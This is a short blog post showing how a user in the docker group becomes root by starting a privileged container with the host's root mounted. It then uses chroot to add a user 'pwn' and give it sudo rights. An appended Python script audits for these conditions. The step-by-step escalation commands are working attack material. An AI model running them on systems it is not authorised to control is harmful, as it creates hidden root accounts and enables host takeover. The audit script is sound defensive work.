From normal to R00T user using this simple technique !
This is not a vulnerability; it is just a showcase of what happens if you give a user full access to Docker ?!
This is one of the techniques I found on my own while pwning some private programs ;)
First we check whether Docker has full access over the system !
Or check your groups to see whether your user is in the docker group or not !
If the docker group is present, we can do our privilege escalation.
For that you need any image that could help !
1. Create a Docker container with / mounted
Use the --privileged flag to grant full access to the container, and mount the host's root directory into the container.
docker run -it --privileged --name root_access_container -v /:/mnt_host_root ubuntu /bin/bash
--privileged : Grants all capabilities to the container, allowing full control over the host system.
-v /:/mnt_host_root : This mounts the host's root (/) into the container's /mnt_host_root directory.
ubuntu : The base image used in the container (you can replace it with any other Linux image).
/bin/bash : Starts a bash shell inside the container.
I'm taking a Debian container; you can choose whatever image you need !
Alternatively you can use the --rm flag to remove the container automatically when we stop using it !
docker run -it --privileged --rm --name root_access_container -v /:/mnt_host_root ubuntu /bin/bash
2. Now you can see we have successfully mounted the host's / root directory into our container. Using chroot (change root) you can directly modify the host's files such as /etc/passwd, /etc/shadow, and /etc/group to create a new user on the host.
Example: trying to create a new user on the host by using the host's 'useradd' binary via the mounted root directory.
I use the following command:
chroot /mnt_host_root useradd -m -s /bin/bash pwn
chroot /mnt_host_root allows you to change the root directory to the mounted host root (/mnt_host_root), effectively running commands as if you were on the host itself.
useradd -m -s /bin/bash pwn creates a new user named pwn with a home directory and sets their shell to /bin/bash.
3. Giving a password:
chroot /mnt_host_root passwd pwn
THE MAIN PART BEGINS HERE ;)
4. Grant sudo privileges to the new host user
Trying these commands: apt update and apt install sudo
Again the same error ? Yeah, because inside the chroot environment (i.e., the host's file system as mounted within the Docker container), the sudo group is either not present or not correctly referenced.
Wait, we can check it using :
chroot /mnt_host_root cat /etc/group | grep sudo
So no output; let's create a sudo group on the host:
chroot /mnt_host_root groupadd sudo
chroot /mnt_host_root usermod -aG sudo pwn
Ahh .. now it works perfectly !
Now let's see if it works or not.
Noo.. it's not in the sudoers file ?!
Okay, let's open and edit the sudoers file and make some nerdy changes !
Uncomment the %sudo line so that we can exec commands !
Let's try again ..!
Gotcha … it worked ;) . Now I'm a root user.
Now I can do all the nerdy things that the root user can do ..!
That's it, nerds. Thanks for reading ..!
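As an added example that is not part of the original post: the walkthrough above rests on two conditions a defender can audit, a user sitting in the docker group and a container started with --privileged plus the host's / bind-mounted inside it. The script below checks both from /etc/group text and from docker inspect JSON; the sample data is constructed, and the field names (HostConfig.Privileged, Mounts[].Source) are the ones docker inspect emits.

```python
"""Audit the two preconditions of the docker-group-to-root walkthrough:
membership in the docker group, and containers that combine --privileged
with a bind mount of the host root. Sample inputs below are constructed."""
import json

HOST_ROOT = "/"


def docker_group_members(group_file: str) -> list[str]:
    """Return the users listed in the 'docker' group of an /etc/group text."""
    for line in group_file.splitlines():
        fields = line.split(":")
        # /etc/group format: name:password:gid:member1,member2,...
        if len(fields) == 4 and fields[0] == "docker":
            return [m for m in fields[3].split(",") if m]
    return []


def audit_containers(inspect_output: str) -> list[dict]:
    """Parse `docker inspect` JSON (a list of container objects) and report
    every container that is privileged and/or bind-mounts the host root."""
    findings = []
    for c in json.loads(inspect_output):
        privileged = bool(c.get("HostConfig", {}).get("Privileged", False))
        # For Type == "bind", Mounts[].Source is the host-side path.
        root_mounts = [m["Destination"] for m in c.get("Mounts", [])
                       if m.get("Type") == "bind" and m.get("Source") == HOST_ROOT]
        if privileged or root_mounts:
            findings.append({
                "name": c.get("Name", "").lstrip("/"),
                "privileged": privileged,
                "host_root_mounted_at": root_mounts,
                # both at once is exactly the combination used in the post
                "full_host_control": privileged and bool(root_mounts),
            })
    return findings


# Constructed sample data, not captured from a real host.
SAMPLE_GROUP = "root:x:0:\nsudo:x:27:alice\ndocker:x:999:alice,bob\n"
SAMPLE_INSPECT = json.dumps([
    {"Name": "/root_access_container",
     "HostConfig": {"Privileged": True, "Binds": ["/:/mnt_host_root"]},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt_host_root"}]},
    {"Name": "/web", "HostConfig": {"Privileged": False, "Binds": []},
     "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/web/_data",
                 "Destination": "/data"}]},
])

if __name__ == "__main__":
    print("docker group members:", docker_group_members(SAMPLE_GROUP))
    for finding in audit_containers(SAMPLE_INSPECT):
        print(finding)
```

On a real host, feed it `getent group docker` output and `docker inspect $(docker ps -q)`; any finding with full_host_control set is a container whose shell is effectively a root shell on the host.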
by 5mukx
Twitter: https://x.com/5mukx
Github: https://github.com/Whitecat18